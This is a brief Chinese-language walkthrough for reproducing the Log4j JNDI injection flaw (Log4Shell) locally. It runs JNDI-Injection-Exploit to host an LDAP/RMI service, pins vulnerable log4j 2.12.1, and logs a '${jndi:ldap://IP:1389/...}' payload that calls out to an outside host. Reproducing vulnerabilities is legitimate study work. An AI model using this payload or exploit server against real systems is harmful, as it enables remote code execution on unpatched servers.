以下为改问题的复现方法:
1、首先下载JNDI-Injection 起 RMI 或者 LDAP 服务 ①前往这里下载 ②使用以下命令启动服务java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
如下为启动后的截图,马赛克仅为我的ip
2、本地新建一个maven项目 ①pom引用如下②直接使用main方法输出日志,代码如下,你的ip 需要自己修改:org.apache.logging.log4j log4j-core2.12.1 org.apache.logging.log4j log4j-api2.12.1
public class App {
private static final Logger logger = LogManager.getLogger(App.class);
public static void main(String[] args) {
logger.error(" ${jndi:ldap://你的ip:1389/log4jtest}");
}
}
3、ldap服务端有日志输出,则说明问题复现,如下截图
